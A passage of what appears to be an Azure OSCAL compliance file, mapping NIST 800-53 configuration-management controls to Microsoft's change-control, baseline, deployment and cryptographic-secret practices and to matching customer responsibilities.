configuration related, and vendor recommendations. Configuration baselines undergo thorough review by security settings baseline experts within Azure, including the Security Assurance team and Microsoft Security Response Center, and other baseline experts across other Microsoft divisions who participate in a Shared Baselines working group. The industry standards and input from baseline experts across Microsoft along with the environment-specific considerations and some role- or instance-specific settings are used to establish the configuration settings. 
Changes to configuration baselines are handled through the update process at least annually, but also when new asset types are added to the inventory. Changes to operational services can only be made when there is a valid business reason such as a planned upgrade to the service. Changes implemented within the production environment are categorized into Request for Change (RFC) types to appropriately schedule, align resources, and provide change metrics back into the change process for continuous improvement. Azure service teams use the following RFC types: Major Release, Minor Release, and Revision Release. Naming conventions for build releases vary by service team, and the specific processes required for the release are specified in the service team specific change management process documents. Changes to configuration settings on Azure assets are handled in two ways. Code changes, image updates, and network device gold images follow the Microsoft Security Development Lifecycle (SDL) process, which requires security signoffs prior to production deployment. Changes to the configuration settings are deployed to the production environment using the change and release management process, including mandatory Safe Deployment Practices (SDP). These processes validate that the configuration setting changes move from one environment to the other with designated signoffs by appropriate Azure service team personnel. Access to migrate changes to production is restricted to the appropriate users via OneIdentity security groups. Changes to configuration settings on running assets made through interactive means, such as logging into and changing a configuration setting of a Windows server, must be made through the standard access elevation process. 
Different assets have different protections in place, depending on the impact of the change. Servers Azure Security Monitoring (ASM) monitors for configuration setting changes. Service teams are able to make certain changes that are not security relevant without response or alerting, but if critical configuration settings, such as audit and log settings, are changed, the action generates an IcM ticket for remediation. Network Devices Any network device change not correlated with a work ticket will generate an IcM ticket for investigation and potential remediation."}],"responsibilities":[{"uuid":"30a66726-730d-47e6-8823-c795d45daa58","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-014"}],"description":"The customer is responsible for determining what types of changes to customer-deployed resources are configuration-controlled.","provided-uuid":"5b7618d0-ec7c-4a4d-849a-e5218d7c9ea4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d7aac68d-4dc1-4880-a9e9-53db0f6b3a15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.b","by-components":[{"uuid":"2bcc5f4e-9b00-4611-b567-2b1ebd5defb1","export":{"provided":[{"uuid":"39608c39-30bb-47bc-b17b-49b40728b025","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-015"}],"description":"All changes under configuration control to Azure assets are reviewed and approved or disapproved with explicit consideration for security impact 
analysis. Per the Microsoft Change Management Standard, all changes require documented testing procedures. Servers It is the responsibility of the change tester to verify against defined test and success criteria and to record the test results in the work item tracking the change. For IPAK changes, all work items impacting code are triaged by the IPAK team before they are implemented. The triage process assesses the priority of the item and potential impact to customers. If an item is of a security nature, input from C+AI Platform Security is sought. For RDOS changes, changes are tested in a non-production environment before being promoted to production. All changes go through the standard change management process which includes a security impact analysis. Network Devices Security impact analyses for network device changes are completed by performing a risk assessment for the change being performed."}],"responsibilities":[{"uuid":"3d11cc01-0905-40d5-9acd-681cb762fc7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-015"}],"description":"The customer is responsible for reviewing proposed configuration-controlled changes to customer-deployed resources.","provided-uuid":"39608c39-30bb-47bc-b17b-49b40728b025"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1c90e30f-e9bb-4ede-8aff-40c9000e9c55","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.c","by-components":[{"uuid":"81a9c299-c9f8-406a-9997-258eccf846bd","export":{"provided":[{"uuid":"181cd027-5d93-4988-bcfa-4a268cadd508","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-016"}],"description":"Azure service teams use Azure DevOps or IcM for change management tracking, where source code and work items related to configuration baselines and configuration settings are tracked. Work items and source code changes document evidence of approvals and track all changes made to releasing a new configuration setting."}],"responsibilities":[{"uuid":"39a7b1c2-0d86-4bba-baec-4510b771c931","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-016"}],"description":"The customer is responsible for documenting configuration-controlled changes associated with customer-deployed resources (see CM-03.b).","provided-uuid":"181cd027-5d93-4988-bcfa-4a268cadd508"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e5826a47-850e-4434-8573-b765c302ff99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.d","by-components":[{"uuid":"c4f6c91a-172b-4ef6-8d65-5da6145f2c83","export":{"provided":[{"uuid":"498e2b4c-8874-4239-ab39-7b67652228cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-017"}],"description":"Azure DevOps ensures that configuration-controlled changes are implemented after they are approved by tracking the change through implementation."}],"responsibilities":[{"uuid":"96724ed3-4ebe-4f6c-8d5b-2e26abd676c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-017"}],"description":"The customer is responsible for implementing configuration-controlled changes approved in CM-03.b.","provided-uuid":"498e2b4c-8874-4239-ab39-7b67652228cc"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5a0d85bd-51cf-4b2a-8a04-e7a5da05b4dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.e","by-components":[{"uuid":"2956e2bd-35e5-4f29-a8c2-f6d84cfc7580","export":{"provided":[{"uuid":"3ea0f6ef-6ba7-42a8-a88b-9bffc42b4b04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-018"}],"description":"Depending on the type of change, the evidence of release approval is documented in either Azure DevOps or IcM. These change management records are retained for a minimum of ninety (90) days."}],"responsibilities":[{"uuid":"d16daf7d-fb8a-4161-92dc-f1f31be7059b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-018"}],"description":"The customer is responsible for retaining a record of configuration-controlled changes to customer-deployed resources.","provided-uuid":"3ea0f6ef-6ba7-42a8-a88b-9bffc42b4b04"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dc07b035-ed8f-4be7-ba40-54e7fdc2f685","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.f","by-components":[{"uuid":"dd38033d-3cf1-425c-a288-0629e9f8500b","export":{"provided":[{"uuid":"3220cfb8-a1f6-475c-9952-e7fe7e2baba7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-019"}],"description":"The tools outlined in Part c of this control provide an auditing capability to any changes to the configuration baselines or configuration settings within the tools. Azure uses Azure DevOps as the versioning system for software code, which tracks the identity of the person who checks code out, the time of the change, and what changes are made to what files. Software and hardware changes are tracked through Azure DevOps or IcM, which also provide detailed audit records of action taken. 
Deployment systems including OneBranch also audit and centrally report actions taken._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f50fc9c2-5e2c-463e-a52d-c8d89a732e06","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-019"}],"description":"The customer is responsible for auditing and reviewing configuration changes.","provided-uuid":"3220cfb8-a1f6-475c-9952-e7fe7e2baba7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"51823beb-95a8-49e1-a1ff-4de432c8fcbc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.g","by-components":[{"uuid":"38f34134-7cba-463a-8128-195d963e1167","export":{"provided":[{"uuid":"2c13a84a-c2d1-42e7-abe2-3a1d9f462820","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-020"}],"description":"All changes to the Azure production environment, except pre-approved changes, must go through peer review, oversight committee review, or crossgroup review approval. Each service team has an internal committee with designated roles; these meet at least monthly, or as needed._x000D_ _x000D_ There are a set of pre-approved changes which do not require additional explicit approval for release. These are standard procedures and common tasks that are documented and are confirmed to be safe to perform without going through the formal change management process. 
Examples of pre-approved Change Types are Create Certificate and Create Stage XStore Account._x000D_ _x000D_ For all Azure assets, Azure works with its authorizing officials by participating in regular meetings with the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators and ISSOs as needed to communicate major changes to or developments in the Azure environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4b73cdf3-c3c5-449e-b050-fc1932643535","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-020"}],"description":"The customer is responsible for coordinating and providing oversight for configuration change control activities.","provided-uuid":"2c13a84a-c2d1-42e7-abe2-3a1d9f462820"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c304aa66-3d6d-4783-8e6e-a760f37d389c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.1","statements":[{"uuid":"d6ef922e-9013-4687-9477-f212558260ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.a","by-components":[{"uuid":"74cec9bb-b98e-43de-9482-ad19e139922f","export":{"provided":[{"uuid":"54b910b2-ffbb-4efb-a6da-fc9b0111f315","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-021"}],"description":"Depending on the type of change, configuration setting changes are documented in either Incident Management (IcM) or Azure DevOps. 
These change management records are retained for a minimum of ninety (90) days._x000D_ _x000D_"}],"responsibilities":[{"uuid":"75152b12-8e3a-4cd8-a855-231f1d3ed9fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-021"}],"description":"The customer is responsible for employing automated mechanisms to document proposed changes (see CM-03.b).","provided-uuid":"54b910b2-ffbb-4efb-a6da-fc9b0111f315"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"65470158-2dcc-4d68-9838-667308d1a0a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.b","by-components":[{"uuid":"e32559cf-fe21-4477-b0d5-3b79273560e9","export":{"provided":[{"uuid":"b540617d-18c6-4c37-9306-4b830319b64e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-022"}],"description":"The IcM and DevOps automated tools used to track and document changes automatically notify the authorized approvers of proposed changes and request change approval. 
Records of changes are retained within tickets for all changes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3a780046-d055-4f0f-b51f-88be97dbf77c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-022"}],"description":"The customer is responsible for employing an automated mechanism to route and request approval for proposed changes to customer-deployed resources.","provided-uuid":"b540617d-18c6-4c37-9306-4b830319b64e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8aba7df0-26e4-49e4-949e-7b6c68685629","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.c","by-components":[{"uuid":"15700a45-88e2-41e8-9c7d-64ce1dfc92cc","export":{"provided":[{"uuid":"60d9f8f1-6604-4398-a88e-42fa2f3bff71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-023"}],"description":"The current queue of proposed changes is reviewed by the service team as part of regular review meetings at least monthly. 
Changes can be abandoned; this is a normal part of the change management lifecycle._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d0672856-01b1-4fa4-b4c8-83a56bd917dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-023"}],"description":"The customer is responsible for employing an automated mechanism to highlight unreviewed change proposals.","provided-uuid":"60d9f8f1-6604-4398-a88e-42fa2f3bff71"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fee2655c-2da9-4707-ba43-fecb71188990","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.d","by-components":[{"uuid":"73d1ae91-6472-43dd-a71b-4fea54c7b3c4","export":{"provided":[{"uuid":"c7a70b60-67a6-4d48-8277-4b9a5502b7e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-024"}],"description":"All the change management tools prevent changes from being deployed without approval from an authorized approver. 
Interactive access via elevation to production assets requires separate approval or approval of properly configured auto-approval in the Just In Time (JIT) tool._x000D_ _x000D_"}],"responsibilities":[{"uuid":"497d6b52-9cac-41f7-9ba2-358f1e5de94f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-024"}],"description":"The customer is responsible for employing an automated mechanism to prohibit the implementation of unapproved changes to customer-deployed resources.","provided-uuid":"c7a70b60-67a6-4d48-8277-4b9a5502b7e3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ed923696-eca0-401a-99ad-dc767d8dad99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.e","by-components":[{"uuid":"68ccdbce-6782-45a5-812b-18285199ec17","export":{"provided":[{"uuid":"aa63568f-6e35-47f6-9f97-2af90ba2d073","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-025"}],"description":"All changes are tracked and documented within the appropriate automated change tracking system. Azure teams use tools such as Azure DevOps or IcM for documentation and tracking purposes. 
All assets implement auditing for changes made via interactive login._x000D_ _x000D_"}],"responsibilities":[{"uuid":"418c9cfd-4d74-4d93-a018-9ca84c869960","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-025"}],"description":"The customer is responsible for employing an automated mechanism to document all implemented changes to customer-deployed resources.","provided-uuid":"aa63568f-6e35-47f6-9f97-2af90ba2d073"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2a134a88-1a92-433a-a557-f8890067fcd0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.f","by-components":[{"uuid":"edd4981d-2da8-43c3-a154-f7a97a0d3204","export":{"provided":[{"uuid":"50f0a6fd-9e15-48e7-a984-18046aef15d0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-026"}],"description":"Upon successful deployment of a change, the relevant service team management personnel, including the change submitters and approvers, are automatically notified by the change tracking system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3c645dd6-fd12-461a-a709-0b77a4f3c62e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-026"}],"description":"The customer is responsible for employing an automated mechanism to provide notifications when approved changes to customer-deployed resources are completed.","provided-uuid":"50f0a6fd-9e15-48e7-a984-18046aef15d0"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cd40c111-121b-4581-b1dc-9c12829fa66d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.2","statements":[{"uuid":"217acf09-4a2f-4e96-97ba-508ee0358509","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.2_smt","by-components":[{"uuid":"d1ba918c-afbc-41ee-b5d4-62a4a49c2d81","export":{"provided":[{"uuid":"6c404e2d-aaf8-415f-b213-f79f22359c01","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-027"}],"description":"Azure tests and validates proposed system changes prior to deployment, either in a separate test environment, or by removing a server from production, making changes, testing, and returning the server to production upon successful completion. When testing and validation is complete, results are documented in the relevant change tracking tool, either Azure DevOps or Incident Management (IcM) depending on the team._x000D_ _x000D_ All code impacting work items are triaged before they are implemented. The triage process assesses the priority of the item and potential impact to customers. If an item is of a security nature, input from C+AI Security is sought. Assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. 
Health indicators from these tests determine whether recently deployed software is propagated to more assets or rolled back._x000D_ _x000D_ Testing procedures for changes are documented within change tickets. Configuration changes and associated approvals and documentation are all kept within tickets or RFCs. Automation is built into the change management tool throughout the change lifecycle including documenting changes to the information system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a7864ece-2218-400a-a7ee-fa900ff083c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-027"}],"description":"The customer is responsible for testing, validating, and documenting changes to customer-deployed resources before implementation.","provided-uuid":"6c404e2d-aaf8-415f-b213-f79f22359c01"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a8db4809-07f1-4a65-90d8-b78fbadc0256","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.4","statements":[{"uuid":"2b4e1eca-cff5-417c-937e-587aba8c04eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.4_smt","by-components":[{"uuid":"257194af-c084-4b20-9668-c19e0f4148ec","export":{"provided":[{"uuid":"0848bd48-c942-421f-a47a-7f5d7fb93ec6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-028"}],"description":"All changes, except pre-approved changes, to the 
Azure production environment must go through service team committee approval. Each service team has an internal committee with designated roles, which includes representatives from Azure Security; it meets at least monthly or as needed._x000D_ _x000D_ Servers_x000D_ _x000D_ The C+AI Platform Security baseline team establishes and maintains the configuration baseline standards for operating systems and service network configurations. The baselines are established based on industry standards, including DISA STIGs, CIS, NSA, and various vulnerability library knowledge bases that are configuration related, and through review of security settings by baseline experts within C+AI Platform Security, including the Security Assurance team and Microsoft Security Response Center, and other baseline experts across other Microsoft divisions who participate in the overall Shared Baselines Teams group virtual team. The industry standards and input from baseline experts across Microsoft, along with environment-specific considerations and some role-specific settings - e.g. domain controller, workgroup server, domain-joined server - are used to establish the configuration settings. The Shared Baselines crossgroup includes required representatives from C+AI Platform Security, including members from the Security Response Team and the Security Assurance team. Additionally, key participants include members from the incident response team and participants from Microsoft consulting who bring in field experience._x000D_ _x000D_ Network Devices_x000D_ _x000D_ For network devices, the Azure Network Engineering team sets the configuration baseline standards for all network devices, using recommended configurations specific to each hardware vendor, including applicable STIGs, and makes updates periodically based upon recommendations from the vendor. For each type of device, the Azure Network Engineering team maintains configuration baselines in Network Device Manager (NDM). 
Only the Azure Networking team can make changes to configuration baselines for network devices in the Azure environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b964d0ca-d3fc-48d2-8a92-c12e21af56d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-028"}],"description":"The customer is responsible for assigning an information security representative to be a member of the change control element defined in CM-03.g.","provided-uuid":"0848bd48-c942-421f-a47a-7f5d7fb93ec6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ac0eba5b-3365-4456-818c-9ac2e9187099","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.6","statements":[{"uuid":"5b9a0071-dcf8-47e6-93a7-7d45f8e84d43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.6_smt","by-components":[{"uuid":"aff70443-1a5d-4edc-b62b-718128268881","export":{"provided":[{"uuid":"f0f8b0f3-552b-4cd0-bddd-ac3abb677d07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-029"}],"description":"Azure Security manages cryptographic secrets on behalf of service teams using an approved secret management store, either Azure Key Vault or dSMS. Microsoft uses the stores to implement cryptographic mechanisms, including to administer and store both group and shared account credentials, as well as to obtain and renew certificates. 
Cryptography changes follow the standard security review process. Cryptographic changes not expressly allowed by established baselines - e.g. when an Azure team requests a non-standard change to configuration settings - may not be made to the current Azure configuration without a completed review. The security review process is run by security representatives in C+AI Security. Changes made to cryptography are not implemented unless approved via the security review process, including approval by the Crypto Board._x000D_ _x000D_ Azure Security controls the configuration of the stores using the Cryptographic Controls SOP, with which the stores are required to comply. For instance, when Microsoft deprecates formerly-approved cryptographic algorithms or key lengths through the change management process, the secret management stores are able to check the inventory of all existing secrets to identify any that rely on the newly-deprecated mechanism._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a9be5381-fb42-4e69-815a-dd0d9c768ae5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-029"}],"description":"The customer is responsible for ensuring that cryptographic mechanisms are under configuration management. 
Microsoft Azure provides the capability for customers to implement configuration management actions over cryptographic secrets using Key Vault functionality, including granular management of cryptographic keys.","provided-uuid":"f0f8b0f3-552b-4cd0-bddd-ac3abb677d07"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f61f4e5b-847f-4c02-ad1c-947060290c2c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-4","statements":[{"uuid":"7e029d09-8dd4-4290-91f0-ab681fa3f37c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-4_smt","by-components":[{"uuid":"09f5f308-3f6f-4039-aa23-948cebf40f33","export":{"provided":[{"uuid":"fe7c7337-821c-4ebc-8a4b-41e30c5b252f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-030"}],"description":"As part of the Security Development Lifecycle (SDL) process, Azure analyzes software and hardware changes to determine potential security impacts prior to change implementation. Changes are required to be documented, tested, and approved by appropriate service team personnel. For all asset types, changes are analyzed as part of the standard change management process, both prior to and after implementation, to verify what was modified resulted in expected output. The SDL process is followed for all engineering and development projects. 
The SDL process consists of five phases: Requirements, Design, Implementation, Verification and Release. The Requirements phase considers the foundational security, privacy, and cost requirements for a given product. The Design phase is the creation of the plan to implement the product to meet the defined requirements, including risk and threat model analysis. The Implementation phase is when security documentation is created for the product, allowing users and customers to make informed decisions on how to deploy it, as well as initial testing to remove any security or privacy issues. The Verification phase is when the implementation is reviewed to ensure that it meets the security and privacy tenets defined in the Requirements phase, and when full product testing takes place. Finally, the Release phase is the creation of incident planning, should any issues regarding the product arise once it is available. Each service team tests proposed system changes prior to deployment, either in a separate test environment, or by removing a server from production, making changes, testing, and returning the server to production upon successful completion. Azure implements safe deployment known as Safe Deployment Practices (SDP), which includes testing in canary regions and rolling out to increasing percentages of the applicable environment before considering the rollout complete. Azure assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. Health indicators from these tests determine whether recently deployed software is propagated to more assets or rolled back. 
